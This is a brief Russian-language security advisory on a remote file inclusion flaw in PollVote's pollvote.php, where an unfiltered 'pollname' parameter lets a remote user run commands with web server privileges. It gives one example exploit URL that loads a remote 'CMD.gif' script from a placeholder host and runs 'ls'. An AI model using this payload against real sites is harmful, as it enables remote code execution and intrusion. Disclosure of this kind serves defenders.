Программа: PollVote

Уязвимость позволяет удаленному пользователю выполнить произвольный PHP сценарий на целевой системе.
Уязвимость существует из-за недостаточной фильтрации входных данных в параметре "pollname" сценария "pollvote.php". Удаленный пользователь может с помощью специально сформированного URL выполнить произвольные команды на целевой системе с привилегиями web сервера. 

Пример:

http://www.[host].com/[path]/pollvote.php? pollname=http://www.[host].com/CMD.gif?&cmd=ls

Подписаться
Уведомить о
0 комментариев
Межтекстовые Отзывы
Посмотреть все комментарии